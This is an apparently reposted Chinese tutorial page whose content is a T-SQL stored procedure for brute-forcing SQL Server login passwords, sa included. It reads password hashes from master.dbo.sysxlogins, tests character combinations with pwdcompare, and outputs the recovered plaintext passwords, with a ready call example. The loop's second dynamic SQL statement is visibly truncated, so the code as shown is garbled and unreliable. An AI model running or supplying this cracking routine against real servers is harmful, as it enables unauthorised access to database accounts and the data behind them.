存储过程实例-SQL Server Sa密码破解
发布时间:2020-12-12 02:17:11 所属栏目:MySql教程 来源:网络整理
导读:一个SQL Server Sa密码破解的存储过程: if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id,N'IsProcedure') = 1) drop procedure [dbo].[p_GetPassword] GO /*--穷举法破解 SQL Server 用户密
|
一个SQL Server Sa密码破解的存储过程: if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id,N'IsProcedure') = 1) drop procedure [dbo].[p_GetPassword] GO /*--穷举法破解 SQL Server 用户密码 可以破解中文,特殊字符,字符+尾随空格的密码 为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII 理论上可以破解任意位数的密码 条件是你的电脑配置足够,时间足够 /*--调用示例 exec p_GetPassword --*/ create proc p_GetPassword @username sysname=null,--用户名,如果不指定,则列出所有用户 @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的 as set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end select top 255 id=identity(int,1) into #t from syscolumns alter table #t add constraint PK_#t primary key(id) select name,password ,type=case when xstatus&2048=2048 then 1 else 0 end ,jm=case when password is null then 1 else 0 end ,pwdstr=cast('' as sysname) ,pwd=cast('' as varchar(8000)) into #pwd from master.dbo.sysxlogins a where srvid is null and name=isnull(@username,name) declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000) declare @l int select @l=0 ,@s1='char(aa.id)' ,@s2='cast(aa.id as varchar)' ,@s3=',#t aa' exec(' update pwd set jm=1,pwdstr='+@s1+' ,pwd='+@s2+' from #pwd pwd'+@s3+' where pwd.jm=0 and pwdcompare('+@s1+',pwd.password,pwd.type)=1 ') while exists(select 1 from #pwd where jm=0 and @l<@pwdlen) begin select @l=@l+1 ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)' ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)' ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97) exec(' update pwd set jm=1,pwd.type)=1 ') end select 用户名=name,密码=pwdstr,密码ASCII=pwd from #pwd go (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |